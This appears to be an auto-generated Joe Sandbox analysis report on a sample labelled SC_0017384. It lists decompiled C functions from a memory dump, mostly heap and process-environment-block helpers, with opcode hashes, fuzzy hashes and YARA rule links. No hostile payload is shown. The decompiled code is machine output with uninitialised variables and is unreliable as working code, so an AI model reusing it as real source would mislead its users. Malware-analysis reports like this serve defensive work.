                                                                              • Instruction ID: ef73cfe9b4802ed46216df9a099c5bafa1235d25960a54097492ab2b6e33afda
                                                                              • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                              • Instruction Fuzzy Hash: D1E0C232280209BBDB226E84CC04F69BB1ADB507A0F204031FE089A694DA759D91D6D4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0179A185 Relevance: .0, Instructions: 20COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0179A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x18567e4 >= 0xa) {
					if(_t5 < 0x1856800 || _t5 >= 0x1856900) {
						return L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E01780010(0x18567e0, _t5);
				}
			}





                                                                              0x0179a190
                                                                              0x0179a1a6
                                                                              0x0179a1c2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0179a192
                                                                              0x0179a192
                                                                              0x0179a19f
                                                                              0x0179a19f

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5813b9533d8442a43dda0aab18456cc8c4d6b50068668be47857ba15f6c091c6
                                                                              • Instruction ID: 7fc8c110b4da78e25c5670233850c4f6f4e248a8d083eaa8f5faa600c8a6196c
                                                                              • Opcode Fuzzy Hash: 5813b9533d8442a43dda0aab18456cc8c4d6b50068668be47857ba15f6c091c6
                                                                              • Instruction Fuzzy Hash: 58D05EA15E21005ACB6D7720A958B25B632F7C4760F74490DF3078B9AAFA648DDDD208
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017916E0 Relevance: .0, Instructions: 17COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E017916E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E01791710(0x18567e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L01784620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                                              0x017916e8
                                                                              0x017916ef
                                                                              0x017916f3
                                                                              0x017916fe
                                                                              0x00000000
                                                                              0x01791700
                                                                              0x0179170d
                                                                              0x0179170d
                                                                              0x017916f2
                                                                              0x017916f2
                                                                              0x017916f2
                                                                              0x017916f2

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c1037394d9cde45cca77c92d98e7c2a2b86f9c66f29424fe95f23d13557a4caf
                                                                              • Instruction ID: 17f426f080e6bacd1e0ba4f0a6ba5eb564a1da31c81be6ab2f6ca04c76c74de4
                                                                              • Opcode Fuzzy Hash: c1037394d9cde45cca77c92d98e7c2a2b86f9c66f29424fe95f23d13557a4caf
                                                                              • Instruction Fuzzy Hash: 77D0A73124010392EF2D5B14A809B147651EB907A5F78005CF307495C0DFA0CDBAE088
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017E53CA Relevance: .0, Instructions: 16COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E017E53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0177EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                                              0x017e53ca
                                                                              0x017e53ce
                                                                              0x017e53d9
                                                                              0x017e53de
                                                                              0x017e53e1
                                                                              0x017e53e1
                                                                              0x017e53e6
                                                                              0x017e53f3
                                                                              0x00000000
                                                                              0x017e53f8
                                                                              0x017e53fb

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                              • Instruction ID: d9086594a1fefa66a477b09786f3f0961d2e7fb211b5c7402d5152ff765e7695
                                                                              • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                              • Instruction Fuzzy Hash: 3BE08C359407849BCF12EB4CCA58F5EFBF5FB48B04F140054A0085B620CA24AC00CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0177AAB0 Relevance: .0, Instructions: 12COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0177AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                              0x0177aab6
                                                                              0x0177aabb
                                                                              0x017ca442
                                                                              0x00000000
                                                                              0x017ca448
                                                                              0x017ca454
                                                                              0x017ca454
                                                                              0x0177aac1
                                                                              0x0177aac1
                                                                              0x0177aac6
                                                                              0x0177aac6

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                              • Instruction ID: 861a02d284bfb8289fd2d2b8c7512d7604c955cb1399eadff48777b5dea776ea
                                                                              • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                              • Instruction Fuzzy Hash: 38D0E935352A80CFE617DB1DC554B15B7A4BB44B85FC50494E501CB762E62CDA44CA00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017935A1 Relevance: .0, Instructions: 12COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E017935A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0177EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                                              0x017935a1
                                                                              0x017935a1
                                                                              0x017935a5
                                                                              0x017935ab
                                                                              0x017935ab
                                                                              0x017935b5
                                                                              0x00000000
                                                                              0x017935c1
                                                                              0x017935b7

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                              • Instruction ID: 1936427125a1d7867ddb2eae8170ca5767615f0760ba96219ee1a919353cc810
                                                                              • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                              • Instruction Fuzzy Hash: 46D0A9314011819AEF02AB38E218B68FBB2BB08208F7820A6800246866C33A4A0EC600
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0176DB40 Relevance: .0, Instructions: 11COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0176DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L01784620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                              0x0176db4d
                                                                              0x0176db54
                                                                              0x0176db5f
                                                                              0x0176db56
                                                                              0x0176db56
                                                                              0x0176db5c
                                                                              0x0176db5c

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                              • Instruction ID: 1c73cb013f4adf359e2487ab631a39728d5038f0463e9185929a06108ef48cee
                                                                              • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                              • Instruction Fuzzy Hash: 6FC08C303D0A02AAEB322F20CD01B00BAA4BB50B05F4400A06701DA0F4EBB8DC01E600
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017EA537 Relevance: .0, Instructions: 11COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E017EA537(intOrPtr _a4, intOrPtr _a8) {

				return L01788E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                              0x017ea553

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                              • Instruction ID: fe5a143fd7bb1f217835146935c3cfcbbdeb1b5474179ed04897128ccd0937ba
                                                                              • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                              • Instruction Fuzzy Hash: 7AC08C37080248BBCB127F81CC00F06BF2AFBA8B60F008010FA080B5B0C632E970EB84
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01783A1C Relevance: .0, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E01783A1C(intOrPtr _a4) {
				void* _t5;

				return L01784620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                              0x01783a35

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                              • Instruction ID: fa3772b60fc494dd74fc5a3f9a926f44eb6b58418255d058c8af640b54c26ff0
                                                                              • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                              • Instruction Fuzzy Hash: DBC08C32180248BBC7126E41DC00F01BB29E7A0B60F000020B6040A5608672EC60D588
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0176AD30 Relevance: .0, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0176AD30(intOrPtr _a4) {

				return L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                              0x0176ad49

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                              • Instruction ID: 38f70f12d48eae146601bfe8ab778d4e8581b662affb3ff935f9911157349719
                                                                              • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                              • Instruction Fuzzy Hash: 5AC02B330C0248BBC7127F45CD00F01BF2DE7A0B60F100020F6040B671C932EC60D588
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017776E2 Relevance: .0, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E017776E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                                              0x017776e4
                                                                              0x00000000
                                                                              0x017776f8
                                                                              0x017776fd

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                              • Instruction ID: 4a94ca157247a81e91c053dee5d419c75dd50618e751c4ca9e7df748578c3bbb
                                                                              • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                              • Instruction Fuzzy Hash: C8C08C701811805AEF2E670CCE28B20BA50AB08708F58019CAB02894A6C368A823C208
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017936CC Relevance: .0, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E017936CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L01784620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                                              0x017936d2
                                                                              0x017936e8
                                                                              0x017936d4
                                                                              0x017936e5
                                                                              0x017936e5

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                              • Instruction ID: d32383a6ee95f7ba251a4ae2387b8a9f41aa89cca87d6ff7f0a8ce5544d7ef33
                                                                              • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                              • Instruction Fuzzy Hash: ECC02B70290440FBDB252F30CD00F14F254F700B21F6403547221454F0E6699C00D100
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01787D50 Relevance: .0, Instructions: 7COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E01787D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                              0x01787d56
                                                                              0x01787d5b
                                                                              0x01787d60
                                                                              0x01787d5d
                                                                              0x01787d5d
                                                                              0x01787d5d

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                              • Instruction ID: f0a57475ec253e1bda3f223a3ccbb88124033f998c33bafd24d44c03427124af
                                                                              • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                              • Instruction Fuzzy Hash: 38B092353419408FCE1AEF18C080B1573E4BB44A40B9400D0E401CBA21D229E8408900
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01792ACB Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E01792ACB() {
				void* _t5;

				return E0177EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                                              0x01792adc

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                              • Instruction ID: 9b8ee03da3f3bff3b42dad66ae476d3c7ad25808eeee239ccc6ff573bb77abe8
                                                                              • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                              • Instruction Fuzzy Hash: 6AB01232C10441CFCF02EF44CA10F29B731FB00750F0544E1900127930C628AC01CB40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9950 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1fda4e68d17bcf0db773dcc85560028fd5820738609543db338b29ba95dc69ce
                                                                              • Instruction ID: 44b8bc0f7ca23472fc473ef0ecee0e9d9eb3a7a4ab2fcb454f74b48ca5a35df9
                                                                              • Opcode Fuzzy Hash: 1fda4e68d17bcf0db773dcc85560028fd5820738609543db338b29ba95dc69ce
                                                                              • Instruction Fuzzy Hash: 6E9002A120540407D190659988447474005E7D4346F51C031A2054555ECB699C517175
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A99D0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7d94ea788677e88002f66c2ce30a75d99efcf6dad63d6f0a143f9c3a9c98765d
                                                                              • Instruction ID: 6d478234fd0392edcdb23718e4b98fb73d7eee0af31d784d69ca227b8da65ab7
                                                                              • Opcode Fuzzy Hash: 7d94ea788677e88002f66c2ce30a75d99efcf6dad63d6f0a143f9c3a9c98765d
                                                                              • Instruction Fuzzy Hash: BD9002A121500047D154619984447464045E7E5245F51C032A2144554CC6699C617165
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017AB040 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4e2d5e63049fc36165e3a3daa3624b702e965f4f665e28d873d957009cb17e9a
                                                                              • Instruction ID: 08c86255ee53f8fda9e8ff9c8876f1c314754c77d84506b1b5050551420947de
                                                                              • Opcode Fuzzy Hash: 4e2d5e63049fc36165e3a3daa3624b702e965f4f665e28d873d957009cb17e9a
                                                                              • Instruction Fuzzy Hash: F69002A1605140474590B19988445469015F7E5345391C131A0444560CC7A89855B2A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9820 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8da2fc5c6c7a00e567215799de7d94e323b739e4ace1b57646685961b2f1af26
                                                                              • Instruction ID: 88489741fa43f9b4792d1b33ec615fe739c15b5e0858d83d8ee0bf807cfbb6b8
                                                                              • Opcode Fuzzy Hash: 8da2fc5c6c7a00e567215799de7d94e323b739e4ace1b57646685961b2f1af26
                                                                              • Instruction Fuzzy Hash: 9290027124500407D191719984447464009F7D4285F91C032A0414554EC7959A56BAA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A98A0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6b731f32e33e228e57375fe2e2c5dc26cf9ef210dff5bd7002c85a600d3205bd
                                                                              • Instruction ID: ca84ee3f9963dac8c93f891b950e83fa2d701002e185c2b7f5121928949532a4
                                                                              • Opcode Fuzzy Hash: 6b731f32e33e228e57375fe2e2c5dc26cf9ef210dff5bd7002c85a600d3205bd
                                                                              • Instruction Fuzzy Hash: 7A90026130500407D152619984547464009E7D5389F91C032E1414555DC7659953B172
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9B00 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4a8aa0298f27d27ffc580b34bd8ae491f6dde8b6d732b16a62a877c2ce7d55dd
                                                                              • Instruction ID: c1b3da43006c46d3d8ddfb6d19d8affc2a9aac38784bea5331404d934b39f39a
                                                                              • Opcode Fuzzy Hash: 4a8aa0298f27d27ffc580b34bd8ae491f6dde8b6d732b16a62a877c2ce7d55dd
                                                                              • Instruction Fuzzy Hash: 3590026124500807D1907199C4547474006E7D4645F51C031A0014554DC756996576F1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017AA3B0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 10828792f5b3415fac0ac5d1f46d4cf5bd74ae394e8edfba1b24d9bdcb9315b9
                                                                              • Instruction ID: 14110abdef2ffe152610474d4e7efb8587dd5fa55456e082c2d2b06887a1ba26
                                                                              • Opcode Fuzzy Hash: 10828792f5b3415fac0ac5d1f46d4cf5bd74ae394e8edfba1b24d9bdcb9315b9
                                                                              • Instruction Fuzzy Hash: 2790027120544007D1907199C48474B9005F7E4345F51C431E0415554CC7559856B261
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9A10 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6223b96527eb8d9265ccc7a2495ca635bbbcf137dd85ed0d297199b583e9da5d
                                                                              • Instruction ID: 898951479da02bc0a39bc9b9721b17c716ac0334a8399303c0d191012f1a1a62
                                                                              • Opcode Fuzzy Hash: 6223b96527eb8d9265ccc7a2495ca635bbbcf137dd85ed0d297199b583e9da5d
                                                                              • Instruction Fuzzy Hash: 0B90027120540407D150619988487874005E7D4346F51C031A5154555EC7A5D8917571
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9A80 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 894e9f65207c1062dc3fcdcf2928c18983bafe902700585a984fb2204c98f2c7
                                                                              • Instruction ID: 8d20d01cc6d8305dd8451528fba335dae160f5d1f68c7dba2e5945da60b46e2f
                                                                              • Opcode Fuzzy Hash: 894e9f65207c1062dc3fcdcf2928c18983bafe902700585a984fb2204c98f2c7
                                                                              • Instruction Fuzzy Hash: 4E90026120544447D19062998844B4F8105E7E5246F91C039A4146554CCA5598557761
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9560 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d312804898d668ec0bda9cffa5e39c2a3c2f236e4918f48b9d4e3935a8b66cc4
                                                                              • Instruction ID: f603637f8fcf00654415b28710c74700d346bb2c93a1649f71f4020c1dfed7b8
                                                                              • Opcode Fuzzy Hash: d312804898d668ec0bda9cffa5e39c2a3c2f236e4918f48b9d4e3935a8b66cc4
                                                                              • Instruction Fuzzy Hash: 29900265225000070195A599464464B4445F7DA395391C035F1406590CC76198657361
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017AAD30 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
